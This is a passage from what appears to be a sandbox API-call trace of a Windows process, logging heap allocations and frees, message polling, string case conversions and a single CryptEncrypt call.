0x34aaa78 [0267.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0267.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0267.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0267.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0267.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.262] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0267.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0267.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0267.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0267.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0267.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0267.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0267.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0267.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0267.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0267.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0267.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0267.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e50 [0267.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0267.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0267.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.264] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0267.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0267.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0267.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0267.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0267.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0267.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.265] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0267.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0267.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0267.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0267.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0267.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.266] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0267.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0267.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0267.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0267.267] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0267.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa78 [0267.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.267] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0267.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0267.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0267.268] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0267.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0267.268] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0267.268] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0267.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0267.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0267.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0267.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0267.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.272] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0267.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0267.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0267.273] CryptEncrypt (in: hKey=0xaa59a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b1368*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b1368*, pdwDataLen=0x8bef68*=0x8) returned 1 [0267.273] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.273] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.273] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.273] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.273] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.273] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.273] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.273] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0267.273] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.273] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0267.273] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.273] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.273] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0267.274] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.274] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0267.274] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.274] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.274] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.274] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.274] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.274] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.274] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.274] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 